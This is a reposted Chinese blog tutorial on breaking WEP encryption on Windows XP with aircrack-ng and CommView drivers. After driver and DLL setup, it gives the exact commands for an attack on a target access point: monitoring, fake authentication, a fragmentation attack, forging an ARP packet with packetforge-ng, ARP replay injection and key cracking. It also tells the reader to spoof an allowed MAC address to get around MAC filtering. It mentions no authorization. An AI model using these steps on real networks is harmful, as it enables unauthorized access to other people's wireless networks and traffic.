天天看點

XP下使用aircrack注入式破解WEP(Commview支援網卡)

這篇文章是介紹怎麼在Windows xp下面使用airrack和注入式攻擊來破解WEP

準備:

一. 首先你需要正确安裝網卡驅動: 如果你的網卡不被commview支援的話,那麼你需要安裝wildpackets的驅動。

Commview所支援的網卡http://www.tamos.com/products/commwifi/adapterlist.php

1. 如果你的網卡被commview支援的話,那麼點下面的位址下載下傳驅動:

http://www.tamos.com/bitrix/redirect.php?event1=download&event2=commwifi&event3=&goto=/files/ca5.zip

2. 如果不被commview支援的網卡則可以下載下傳widpackets的驅動:

http://www.wildpackets.com/support/downloads/drivers

注意:下面的教程是在你正确安裝commview的驅動的前提下進行的!

二.

你需要下載下傳這個.dll檔案(隻适用于commview 的網友):

http://darkircop.org/commview.dll

三. 你需要下載下傳aircrack 壓縮包:

http://download.aircrack-ng.org/aircrack-ng-1.0-rc1-win.zip

四. 解壓aircrack 壓縮包到你的任意硬碟根目錄,在這裡我是解壓到c盤

五. 把B下載下傳到的commview.dll 放到D解壓的檔案夾,應該放到目錄c:\aircrack\

六. 去目錄c:\program files\commview for wifi\(注意這個目錄是安裝完commview以後才會有,也就是A1你下載下傳的檔案),然後找到”ca2k.dll”檔案,把”ca2k.dll”,拷貝到(c:\aircrack).

當你完成以上準備以後,就可以開始正式的破解了!

破解:

1:打開一個指令提示符 (開始 > 運作 > cmd.exe)

2:在指令提示符視窗下面輸入:

Cd c:\aircrack 

按下回車

3 在指令相同的提示符視窗下面輸入: 

airserv-ng -d commview.dll

按下回車

你看到的回複應該跟下面一樣:

Opening card commview.dll 

Setting chan 1 

Opening sock port 666 

Serving commview.dll chan 1 on port 666

如果你沒有看到上面的結果的話,而是看到下面的結果的話:

注意這裡可能會有兩種情況出現!!!!!:

(1)

"Opening card commview.dll 

Adapter not found 

get_guid() 

airserv-ng: wi_open(): No error"

這種情況那麼你可以試試這個指令:

airserv-ng -d "commview.dll|debug"

然後你可能會看到下面的結果

Opening card commview.dll|debug 

Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470 

get_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co 

mboCard Gold - Paketplaner-Miniport 

Adapter not found 

get_guid() 

airserv-ng: wi_open(): No error

那麼你隻要輸入下面的指令就可以了

airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"

或者會自動搜尋網卡,然後提示你是不是這個網卡,然你選yes/no,那麼你需要選擇yes就可以了

(2)"Opening card commview.dll 

F1 

init_lib() 

airserv-ng: wi_open(): No error"

這種情況的話,那麼你應該是由于安裝了,windpackets 驅動而産生的問題,那麼建議你安裝commview 驅動,如果可能的話.

執行個體:

破解AP的ESSID = wifi16

破解AP的BSSID = 11:22:33:44:55:66

破解AP的CHANNEL=6

自己用于監聽網卡的MAC = 01:23:45:67:89:01

1.首先監聽AP

airodump-ng --channel 6 --write Filename 127.0.0.1:666

2.建立虛拟連接配接:

aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

如果一切正常的話那麼你會得到下面的回複:

Sending Authentication Request 

Authentication successful 

Sending Association Request 

Association successful

如果你得到:

AP rejects the source MAC address

這說明你AP設定了MAC過濾,那你需要把你的MAC位址改成破解網絡允許的位址.

如果你持續得到:

sending authentication request

那麼說明你離破解網絡太遠了,信号太弱,你需要離破解網絡跟進一點,以獲得更好的信号.

3.利用-5碎片攻擊模式進行攻擊

aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

如果成功将會得到一個xor檔案,例如檔案為fragment-0124-161129.xor

4.利用packetforge-ng 構造一個用于注入的arp包

packetforge-ng -0 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w myarp

5.利用-2的arp注入攻擊模式進行注入

aireplay-ng -2 -r myarp 127.0.0.1:666

6.利用aircrack來破解WP

aircrack-ng -n 64 Filename.cap

轉載自:http://hi.baidu.com/suntb/item/5eeead27085d3e0e43634a23